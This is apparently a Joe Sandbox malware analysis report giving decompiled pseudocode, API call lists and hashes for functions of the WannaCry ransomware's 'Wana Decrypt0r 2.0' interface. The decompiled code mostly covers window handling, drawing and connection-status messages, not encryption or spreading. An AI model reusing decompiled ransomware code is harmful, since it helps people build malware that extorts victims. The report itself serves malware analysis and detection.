                                  				char _v1928;
                                  				void* _v1992;
                                  				void* _v2056;
                                  				void* _v2120;
                                  				char _v2212;
                                  				char _v2216;
                                  				intOrPtr _t144;
                                  
                                  				_push(0xffffffff);
                                  				_push(E00413A76);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t144;
                                  				E0040B620(L"Wana Decrypt0r 2.0", 1);
                                  				_push(0);
                                  				L00412F08();
                                  				L00412F02();
                                  				L00412EFC();
                                  				E004060E0( &_v2212, 0);
                                  				_v8 = 0;
                                  				 *((intOrPtr*)(__ecx + 0x20)) =  &_v2216;
                                  				L00412B72(); // executed
                                  				_v8 = 0x1d;
                                  				_v24 = 0x415a30;
                                  				E00403F20( &_v24);
                                  				_v8 = 0x1c;
                                  				_v32 = 0x415a30;
                                  				E00403F20( &_v32);
                                  				_v8 = 0x1b;
                                  				_v40 = 0x415a30;
                                  				E00403F20( &_v40);
                                  				_v8 = 0x1a;
                                  				_v48 = 0x415a44;
                                  				E00403F20( &_v48);
                                  				_v8 = 0x19;
                                  				_v56 = 0x415a44;
                                  				E00403F20( &_v56);
                                  				_v8 = 0x18;
                                  				_v64 = 0x415a44;
                                  				E00403F20( &_v64);
                                  				_v8 = 0x17;
                                  				_v72 = 0x415a44;
                                  				E00403F20( &_v72);
                                  				_v8 = 0x16;
                                  				_v80 = 0x415a44;
                                  				E00403F20( &_v80);
                                  				_v8 = 0x15;
                                  				_v88 = 0x415a44;
                                  				E00403F20( &_v88);
                                  				_v8 = 0x14;
                                  				_v96 = 0x415a44;
                                  				E00403F20( &_v96);
                                  				_v8 = 0x13;
                                  				_v104 = 0x415a44;
                                  				E00403F20( &_v104);
                                  				_v8 = 0x12;
                                  				E00403F90( &_v112);
                                  				_v8 = 0x11;
                                  				E00403F90( &_v120);
                                  				_v8 = 0x10;
                                  				L00412CC2();
                                  				_v8 = 0xf;
                                  				L00412CC2();
                                  				_v8 = 0xe;
                                  				L00412CC2();
                                  				_v8 = 0xd;
                                  				L00412CC2();
                                  				_v8 = 0xc;
                                  				L00412EF6();
                                  				_v8 = 0xb;
                                  				E004050A0( &_v1124);
                                  				_v8 = 0xa;
                                  				E004050A0( &_v1248);
                                  				_v8 = 9;
                                  				E00404170( &_v1352);
                                  				_v8 = 8;
                                  				E00404170( &_v1456);
                                  				_v8 = 7;
                                  				E00404170( &_v1560);
                                  				_v8 = 6;
                                  				E00404170( &_v1664);
                                  				_v8 = 5;
                                  				E00405D90( &_v1796);
                                  				_v8 = 4;
                                  				E00405D90( &_v1928);
                                  				_v8 = 3;
                                  				L00412EF0();
                                  				_v8 = 2;
                                  				L00412EF0();
                                  				_v8 = 1;
                                  				L00412D4C();
                                  				_v8 = 0xffffffff;
                                  				L00412C86();
                                  				 *[fs:0x0] = _v16;
                                  				return 0;
                                  			}

                                  APIs
                                    • Part of subcall function 0040B620: FindWindowW.USER32(00000000,00000000), ref: 0040B628
                                    • Part of subcall function 0040B620: ShowWindow.USER32(00000000,00000005,00000000,?,00000000), ref: 0040B638
                                    • Part of subcall function 0040B620: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000043,?,00000000), ref: 0040B651
                                    • Part of subcall function 0040B620: SetWindowPos.USER32(00000000,000000FE,00000000,00000000,00000000,00000000,00000043,?,00000000), ref: 0040B660
                                    • Part of subcall function 0040B620: KiUserCallbackDispatcher.NTDLL(00000000), ref: 0040B663
                                    • Part of subcall function 0040B620: SetFocus.USER32(00000000,?,00000000), ref: 0040B66A
                                    • Part of subcall function 0040B620: SetActiveWindow.USER32(00000000,?,00000000), ref: 0040B671
                                    • Part of subcall function 0040B620: BringWindowToTop.USER32(00000000), ref: 0040B678
                                    • Part of subcall function 0040B620: ExitProcess.KERNEL32 ref: 0040B689
                                  • #1134.MFC42(00000000,Wana Decrypt0r 2.0,00000001), ref: 00405A8C
                                  • #2621.MFC42 ref: 00405A96
                                  • #6438.MFC42 ref: 00405A9B
                                    • Part of subcall function 004060E0: #324.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406107
                                    • Part of subcall function 004060E0: #567.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406117
                                    • Part of subcall function 004060E0: #567.MFC42(00000066,00000000), ref: 0040612F
                                    • Part of subcall function 004060E0: #567.MFC42(00000066,00000000), ref: 00406147
                                    • Part of subcall function 004060E0: #567.MFC42(00000066,00000000), ref: 004061DF
                                    • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 004061F7
                                    • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 00406209
                                    • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 00406219
                                    • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 00406229
                                  • #2514.MFC42 ref: 00405AC1
                                    • Part of subcall function 00403F20: #2414.MFC42(?,?,?,004136B8,000000FF,00403F08), ref: 00403F4B
                                    • Part of subcall function 00403F90: #2414.MFC42(?,?,?,004136D8,000000FF,00403F78), ref: 00403FBB
                                  • #800.MFC42 ref: 00405C33
                                  • #800.MFC42 ref: 00405C47
                                  • #800.MFC42 ref: 00405C5B
                                  • #800.MFC42 ref: 00405C6F
                                  • #781.MFC42 ref: 00405C83
                                    • Part of subcall function 004050A0: #800.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050CE
                                    • Part of subcall function 004050A0: #795.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050DD
                                    • Part of subcall function 00404170: #2414.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041B2
                                    • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041C5
                                    • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041D2
                                    • Part of subcall function 00404170: #795.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041E1
                                    • Part of subcall function 00405D90: #654.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DBE
                                    • Part of subcall function 00405D90: #765.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DCD
                                  • #609.MFC42 ref: 00405D37
                                  • #609.MFC42 ref: 00405D4B
                                  • #616.MFC42 ref: 00405D5C
                                  • #641.MFC42 ref: 00405D70
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #800$Window$#540#567$#2414$#609#795$#1134#2514#2621#324#616#641#6438#654#765#781ActiveBringCallbackDispatcherExitFindFocusProcessShowUser
                                  • String ID: 0ZA$DZA$Wana Decrypt0r 2.0
                                  • API String ID: 1759550818-2594244635
                                  • Opcode ID: e0fcef159a601972dbb815ea7c34e59d1ddbf6f278b0c37dd8899ed76481b774
                                  • Instruction ID: 9717df00861f10ea142a6202e5f0f29f583150bd1f0a7909c2c79a4805d5fd97
                                  • Opcode Fuzzy Hash: e0fcef159a601972dbb815ea7c34e59d1ddbf6f278b0c37dd8899ed76481b774
                                  • Instruction Fuzzy Hash: 3871B7345097C18EE735EB25C2557DFBBE4BFA6308F48981E94C916682DFB81108CBA7
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 307 407a90-407ab7 308 407bf4-407c28 #2385 307->308 309 407abd-407ac5 307->309 310 407ac7 309->310 311 407aca-407ad1 309->311 310->311 311->308 312 407ad7-407af9 call 404c40 #2514 311->312 315 407b72-407bef #2414 * 2 #800 #641 312->315 316 407afb-407b6d #537 #941 #939 #6876 * 2 #535 call 4082c0 #800 312->316 315->308 316->315
                                  C-Code - Quality: 68%
                                  			E00407A90(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                  				char _v4;
                                  				char _v8;
                                  				char _v20;
                                  				intOrPtr _v24;
                                  				char _v32;
                                  				void* _v36;
                                  				char _v44;
                                  				char _v132;
                                  				char* _v136;
                                  				void* _v140;
                                  				void* _v144;
                                  				void* _v148;
                                  				void* _v152;
                                  				char _v160;
                                  				intOrPtr _v164;
                                  				char _v168;
                                  				void* _v180;
                                  				intOrPtr _t42;
                                  				intOrPtr _t43;
                                  				void* _t44;
                                  				void* _t70;
                                  				intOrPtr _t72;
                                  				intOrPtr _t73;
                                  
                                  				_push(0xffffffff);
                                  				_push(E00413F17);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t72;
                                  				_t73 = _t72 - 0x80;
                                  				_t70 = __ecx;
                                  				if(_a4 == 0x1388) {
                                  					_t43 = __ecx + 0x2f8;
                                  					if(_t43 != 0) {
                                  						_t43 =  *((intOrPtr*)(_t43 + 0x20));
                                  					}
                                  					if(_a8 == _t43) {
                                  						_t44 = E00404C40( &_v132, 0);
                                  						_v8 = 0;
                                  						L00412B72();
                                  						if(_t44 == 1) {
                                  							_push("***");
                                  							L00412CAA();
                                  							_push("\t");
                                  							_v8 = 1;
                                  							L00412F68();
                                  							_push( &_v44);
                                  							L00412F62();
                                  							_push(0x3b);
                                  							_push(0xa);
                                  							L00412F5C();
                                  							_push(0x3b);
                                  							_push(0xd);
                                  							L00412F5C();
                                  							_push(1);
                                  							_v164 = _t73;
                                  							L00412F56();
                                  							E004082C0(_t70,  &_v168,  &_v160);
                                  							_v44 = 0;
                                  							L00412CC2();
                                  						}
                                  						_v4 = 2;
                                  						_v20 = 0x415c00;
                                  						_v136 =  &_v20;
                                  						_v4 = 5;
                                  						L00412D52();
                                  						_v20 = 0x415bec;
                                  						_v136 =  &_v32;
                                  						_v32 = 0x415c00;
                                  						_v4 = 6;
                                  						L00412D52();
                                  						_v32 = 0x415bec;
                                  						_v4 = 2;
                                  						L00412CC2();
                                  						_v4 = 0xffffffff;
                                  						L00412C86();
                                  					}
                                  				}
                                  				_t42 = _a8;
                                  				_push(_a12);
                                  				_push(_t42);
                                  				_push(_a4);
                                  				L00412BAE(); // executed
                                  				 *[fs:0x0] = _v24;
                                  				return _t42;
                                  			}

                                  APIs
                                  • #2514.MFC42 ref: 00407AF1
                                  • #537.MFC42(***), ref: 00407B04
                                  • #941.MFC42(00421234,***), ref: 00407B1A
                                  • #939.MFC42(?,00421234,***), ref: 00407B28
                                  • #6876.MFC42(0000000A,0000003B,?,00421234,***), ref: 00407B35
                                  • #6876.MFC42(0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B42
                                  • #535.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B55
                                  • #800.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B6D
                                  • #2414.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B99
                                  • #2414.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407BC2
                                  • #800.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407BDB
                                  • #641.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407BEF
                                  • #2385.MFC42(?,?,?), ref: 00407C0E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2414#6876#800$#2385#2514#535#537#641#939#941
                                  • String ID: ***$[A$[A
                                  • API String ID: 3659526348-3419262722
                                  • Opcode ID: 7b5a321b8fc36d37a949ca2324a4224a0761ed0f7d540cde034222370581aa5f
                                  • Instruction ID: 6b54b999ec918a2e7db5809f8de8f0b59fd624410e6f3b71b4409e3b9ece79cc
                                  • Opcode Fuzzy Hash: 7b5a321b8fc36d37a949ca2324a4224a0761ed0f7d540cde034222370581aa5f
                                  • Instruction Fuzzy Hash: D5416A3410C781DAD324DB21C541BEFB7E4BB94704F408A1EB5A9832D1DBB89549CF67
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 319 405580-4055c1 GetClientRect 320 4055c7-405664 #470 #1168 #8 #323 CreateCompatibleDC #1640 #2860 319->320 321 4057c9-4057e0 319->321 322 405666 320->322 323 405669-4056ac #5785 CreateSolidBrush FillRect 320->323 322->323 324 405770-405777 323->324 325 4056b2-405721 call 405110 BitBlt 323->325 326 405779 324->326 327 40577c-4057c4 #5785 #2405 DeleteObject * 2 #640 #755 324->327 330 405723-405729 325->330 331 40575b-40576a 325->331 326->327 327->321 330->324 332 40572b-40572d 330->332 331->324 331->325 332->331 333 40572f-405734 332->333 333->331 334 405736-40573a 333->334 334->324 335 40573c-405757 334->335 335->331
                                  C-Code - Quality: 78%
                                  			E00405580(void* __ecx) {
                                  				int _v8;
                                  				intOrPtr _v12;
                                  				char _v28;
                                  				char _v80;
                                  				void* _v96;
                                  				struct tagRECT _v112;
                                  				signed int _v116;
                                  				void* _v120;
                                  				struct HDC__* _v140;
                                  				long _v144;
                                  				struct tagRECT _v160;
                                  				char _v164;
                                  				void* _v172;
                                  				intOrPtr _v176;
                                  				char _v188;
                                  				int _v192;
                                  				int _v196;
                                  				int _v204;
                                  				intOrPtr _v212;
                                  				void* _v216;
                                  				struct HBRUSH__* _v220;
                                  				char _v224;
                                  				intOrPtr _v228;
                                  				void* _v244;
                                  				intOrPtr _v248;
                                  				intOrPtr _v252;
                                  				signed int _v256;
                                  				void* _v260;
                                  				void* _v264;
                                  				void* _v268;
                                  				int _v272;
                                  				intOrPtr _v296;
                                  				intOrPtr _v300;
                                  				intOrPtr _v304;
                                  				int _t78;
                                  				long _t79;
                                  				struct HBRUSH__* _t80;
                                  				struct HDC__* _t84;
                                  				char _t85;
                                  				struct HBRUSH__* _t86;
                                  				intOrPtr _t89;
                                  				intOrPtr _t90;
                                  				intOrPtr _t102;
                                  				intOrPtr _t104;
                                  				intOrPtr _t108;
                                  				intOrPtr _t136;
                                  				void* _t151;
                                  				struct HBRUSH__* _t152;
                                  				void* _t153;
                                  				void* _t156;
                                  				int _t160;
                                  				intOrPtr _t162;
                                  
                                  				_push(0xffffffff);
                                  				_push(E00413943);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t162;
                                  				_t156 = __ecx;
                                  				_t78 = GetClientRect( *(__ecx + 0x20),  &_v112);
                                  				_t160 = 0;
                                  				_v204 = 0;
                                  				_t108 =  *((intOrPtr*)( *((intOrPtr*)(_t156 + 0x44)) - 8));
                                  				_v176 = _t108;
                                  				if(_t108 != 0) {
                                  					L00412DD0(); // executed
                                  					_t79 =  *(_t156 + 0x50);
                                  					_v8 = 0;
                                  					_v164 = 0xffb53f;
                                  					_v160.left = _t79;
                                  					_v160.top = 0x674017;
                                  					_v160.right =  *((intOrPtr*)(_t156 + 0x4c));
                                  					_v160.bottom = 0;
                                  					_v144 =  *(_t156 + 0x54);
                                  					L00412E5A();
                                  					_t80 =  *((intOrPtr*)(_t79 + 8));
                                  					__imp__#8(_t80,  *((intOrPtr*)(_t156 + 0x58)), 0,  &_v164, 3, _t156, _t151);
                                  					_t152 = _t80;
                                  					_v220 = _t152;
                                  					L00412E54();
                                  					asm("sbb eax, eax");
                                  					_v28 = 1;
                                  					_t84 = CreateCompatibleDC( ~( &_v120) & _v116);
                                  					_push(_t84);
                                  					L00412E4E();
                                  					_push(_t152); // executed
                                  					L00412DE2(); // executed
                                  					if(_t84 != 0) {
                                  						_t84 =  *(_t84 + 4);
                                  					}
                                  					_push(_t84);
                                  					_t85 = _v224;
                                  					_push(_t85);
                                  					L00412E48();
                                  					_v212 = _t85;
                                  					_t153 = 0;
                                  					_v252 = 1;
                                  					_t86 = CreateSolidBrush( *(_t156 + 0x54));
                                  					_v220 = _t86;
                                  					FillRect(_v140,  &_v160, _t86);
                                  					_t89 = 0;
                                  					_v260 = 0;
                                  					if(_t108 > 0) {
                                  						do {
                                  							_v224 =  *((intOrPtr*)( *((intOrPtr*)(_t156 + 0x44)) + _t89));
                                  							E00405110(_t156,  &_v188, _v224);
                                  							asm("sbb eax, eax");
                                  							BitBlt(_v160, _t160, _v272,  *((intOrPtr*)(_t156 + 0x60)) +  *((intOrPtr*)(_t156 + 0x68)),  *((intOrPtr*)(_t156 + 0x64)) +  *((intOrPtr*)(_t156 + 0x6c)),  ~( &_v260) & _v256, _v196, _v192, 0xcc0020);
                                  							_t102 =  *((intOrPtr*)(_t156 + 0x74));
                                  							_t160 = _t160 +  *((intOrPtr*)(_t156 + 0x60)) +  *((intOrPtr*)(_t156 + 0x68));
                                  							_t153 = _t153 + 1;
                                  							if(_t153 != _t102) {
                                  								goto L10;
                                  							} else {
                                  								_t136 =  *((intOrPtr*)(_t156 + 0x70));
                                  								if(_t136 != 1) {
                                  									if(_t153 != _t102) {
                                  										goto L10;
                                  									} else {
                                  										_t104 = _t136;
                                  										if(_t104 <= 1) {
                                  											goto L10;
                                  										} else {
                                  											if(_v304 != _t104) {
                                  												_t153 = 0;
                                  												_t160 = 0;
                                  												_v300 = _v300 +  *((intOrPtr*)(_t156 + 0x64)) +  *((intOrPtr*)(_t156 + 0x6c));
                                  												_v304 = _v304 + 1;
                                  												goto L10;
                                  											}
                                  										}
                                  									}
                                  								}
                                  							}
                                  							goto L11;
                                  							L10:
                                  							_t89 = _v296 + 1;
                                  							_v296 = _t89;
                                  						} while (_t89 < _v272);
                                  					}
                                  					L11:
                                  					_t90 = _v228;
                                  					if(_t90 != 0) {
                                  						_t90 =  *((intOrPtr*)(_t90 + 4));
                                  					}
                                  					_push(_t90);
                                  					_push(_v248);
                                  					L00412E48();
                                  					L00412E42();
                                  					DeleteObject(_v264);
                                  					_t78 = DeleteObject(_v244);
                                  					_v80 = 0;
                                  					L00412E3C();
                                  					_v80 = 0xffffffff;
                                  					L00412DB8();
                                  				}
                                  				 *[fs:0x0] = _v12;
                                  				return _t78;
                                  			}

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #5785CreateDeleteObjectRect$#1168#1640#2405#2860#323#470#640#755BrushClientCompatibleFillSolid
                                  • String ID:
                                  • API String ID: 1233696098-0
                                  • Opcode ID: d2a394ca3572882bfb2f5d87bffa0f05435ffd103ecaeaaf491a49074e348053
                                  • Instruction ID: b627e9c1237585dd637a27707791d59f98fdace04f8481d3914a5fbe5096edf5
                                  • Opcode Fuzzy Hash: d2a394ca3572882bfb2f5d87bffa0f05435ffd103ecaeaaf491a49074e348053
                                  • Instruction Fuzzy Hash: 057135716087419FC324DF69C984AABB7E9FB88704F004A2EF59AC3350DB74E845CB66
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 336 401600-401614 337 4016e5-4016e7 336->337 338 40161a-40161b 336->338 339 401734-401737 337->339 340 4016e9-401731 #537 call 401970 SendMessageA #2385 337->340 341 40161d-40161e 338->341 342 40168f-401691 338->342 344 401743-401754 #2385 339->344 346 401739 339->346 341->344 345 401624-401626 341->345 347 401693-4016db #537 call 401970 SendMessageA #2385 342->347 348 4016de-4016e1 342->348 350 401628-40165b #537 call 401970 #2385 345->350 351 40165e-401661 345->351 346->344 348->344 353 4016e3 348->353 351->348 355 401663-40168c #537 call 401970 #2385 351->355 353->346
                                  C-Code - Quality: 65%
                                  			E00401600(void* __ecx, intOrPtr _a4, long _a8, intOrPtr _a12) {
                                  				void* _t19;
                                  				long _t21;
                                  				long _t24;
                                  				void* _t25;
                                  				void* _t26;
                                  				intOrPtr _t27;
                                  				long _t48;
                                  				void* _t49;
                                  				intOrPtr _t50;
                                  
                                  				_t27 = _a4;
                                  				_t48 = _a8;
                                  				_t19 = _t27 - 0x4e20;
                                  				_t49 = __ecx;
                                  				if(_t19 == 0) {
                                  					if(_t48 != 0) {
                                  						if(_t48 == 0xffffffff) {
                                  							goto L14;
                                  						}
                                  						goto L15;
                                  					} else {
                                  						_push(__ecx);
                                  						_a4 = _t50;
                                  						L00412CAA();
                                  						E00401970("Connected");
                                  						_t21 = SendMessageA( *(_t49 + 0x80), 0x402, 0x1e, _t48);
                                  						_push(_a4);
                                  						_push(_t48);
                                  						_push(_t27);
                                  						 *(_t49 + 0xb0) = 0x23;
                                  						L00412BAE();
                                  						return _t21;
                                  					}
                                  				} else {
                                  					_t19 = _t19 - 1;
                                  					if(_t19 == 0) {
                                  						if(_t48 != 0) {
                                  							goto L9;
                                  						} else {
                                  							_push(__ecx);
                                  							_a4 = _t50;
                                  							L00412CAA();
                                  							E00401970("Sent request");
                                  							_t24 = SendMessageA( *(_t49 + 0x80), 0x402, 0x23, _t48);
                                  							_push(_a4);
                                  							_push(_t48);
                                  							_push(_t27);
                                  							 *(_t49 + 0xb0) = 0x28;
                                  							L00412BAE();
                                  							return _t24;
                                  						}
                                  					} else {
                                  						_t19 = _t19 - 1;
                                  						if(_t19 != 0) {
                                  							L15:
                                  							_push(_a12);
                                  							_push(_t48);
                                  							_push(_t27); // executed
                                  							L00412BAE(); // executed
                                  							return _t19;
                                  						} else {
                                  							if(_t48 != 0) {
                                  								if(_t48 != 1) {
                                  									L9:
                                  									if(_t48 == 0xffffffff) {
                                  										L14:
                                  										 *((intOrPtr*)(_t49 + 0xa8)) = 0xffffffff;
                                  									}
                                  									goto L15;
                                  								} else {
                                  									_push(__ecx);
                                  									_a4 = _t50;
                                  									L00412CAA();
                                  									_t25 = E00401970("Succeed");
                                  									_push(_a4);
                                  									_push(_t48);
                                  									_push(_t27);
                                  									L00412BAE();
                                  									return _t25;
                                  								}
                                  							} else {
                                  								_push(__ecx);
                                  								_a4 = _t50;
                                  								L00412CAA();
                                  								_t26 = E00401970("Received response");
                                  								_push(_a4);
                                  								_push(_t48);
                                  								_push(_t27);
                                  								 *((intOrPtr*)(_t49 + 0xa8)) = 1;
                                  								L00412BAE();
                                  								return _t26;
                                  							}
                                  						}
                                  					}
                                  				}
                                  			}













                                  APIs
                                  • #2385.MFC42 ref: 00401653
                                  • #537.MFC42(Received response), ref: 00401634
                                    • Part of subcall function 00401970: #3092.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 00401997
                                    • Part of subcall function 00401970: #6199.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 0040199E
                                    • Part of subcall function 00401970: #800.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 004019AF
                                  • #537.MFC42(Succeed), ref: 0040166F
                                  • #2385.MFC42(?,?,?,Succeed), ref: 00401684
                                  • #537.MFC42(Sent request), ref: 0040169F
                                  • SendMessageA.USER32(?,00000402,00000023,?), ref: 004016BA
                                  • #2385.MFC42 ref: 004016D3
                                  • #537.MFC42(Connected), ref: 004016F5
                                  • SendMessageA.USER32(?,00000402,0000001E,?), ref: 00401710
                                  • #2385.MFC42 ref: 00401729
                                  • #2385.MFC42(?,?,?), ref: 0040174C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2385$#537$MessageSend$#3092#6199#800
                                  • String ID: Connected$Received response$Sent request$Succeed
                                  • API String ID: 3790904636-3692714192
                                  • Opcode ID: 4248ce8c7a47d30574ec48fc369442f637571c250744fd81582f6567f40f10fe
                                  • Instruction ID: e9690c31fbc1831b63af9a5cc079f352e9ea826ed21b4fe1124c0ccffc889961
                                  • Opcode Fuzzy Hash: 4248ce8c7a47d30574ec48fc369442f637571c250744fd81582f6567f40f10fe
                                  • Instruction Fuzzy Hash: A631E8B130430067C5209F1AD959EAF7B69EBD4BB4F10852FF149A33D1CA795C4582FA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 370 4063a0-4064b5 #2302 * 12 #2370 * 3
                                  APIs
                                  • #2302.MFC42(?,0000040F,?), ref: 004063B2
                                  • #2302.MFC42(?,000003EC,?,?,0000040F,?), ref: 004063C4
                                  • #2302.MFC42(?,000003EB,?,?,000003EC,?,?,0000040F,?), ref: 004063D6
                                  • #2302.MFC42(?,000003F3,?,?,000003EB,?,?,000003EC,?,?,0000040F,?), ref: 004063E8
                                  • #2302.MFC42(?,000003F4,?,?,000003F3,?,?,000003EB,?,?,000003EC,?,?,0000040F,?), ref: 004063FA
                                  • #2302.MFC42(?,000003F5,?,?,000003F4,?,?,000003F3,?,?,000003EB,?,?,000003EC,?,?), ref: 0040640C
                                  • #2302.MFC42(?,000003F2,?,?,000003F5,?,?,000003F4,?,?,000003F3,?,?,000003EB,?,?), ref: 0040641E
                                  • #2302.MFC42(?,000003EE,?,?,000003F2,?,?,000003F5,?,?,000003F4,?,?,000003F3,?,?), ref: 00406430
                                  • #2302.MFC42(?,000003F9,?,?,000003EE,?,?,000003F2,?,?,000003F5,?,?,000003F4,?,?), ref: 00406442
                                  • #2302.MFC42(?,00000401,?,?,000003F9,?,?,000003EE,?,?,000003F2,?,?,000003F5,?,?), ref: 00406454
                                  • #2302.MFC42(?,000003FD,?,?,00000401,?,?,000003F9,?,?,000003EE,?,?,000003F2,?,?), ref: 00406466
                                  • #2302.MFC42(?,000003E8,?,?,000003FD,?,?,00000401,?,?,000003F9,?,?,000003EE,?,?), ref: 00406478
                                  • #2370.MFC42(?,000003FF,?,?,000003E8,?,?,000003FD,?,?,00000401,?,?,000003F9,?,?), ref: 0040648A
                                  • #2370.MFC42(?,000003FC,?,?,000003FF,?,?,000003E8,?,?,000003FD,?,?,00000401,?,?), ref: 0040649C
                                  • #2370.MFC42(?,000003EF,?,?,000003FC,?,?,000003FF,?,?,000003E8,?,?,000003FD,?,?), ref: 004064AE
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2302$#2370
                                  • String ID:
                                  • API String ID: 1711274145-0
                                  • Opcode ID: f4b882eb859de0a193a05a3978ec51d1331cae20c00cf70a3d190a6334ff0923
                                  • Instruction ID: 0d28d22553b71fc94a0ee6c66579bb390b9294cd647fac9b7e1ecc0347327b15
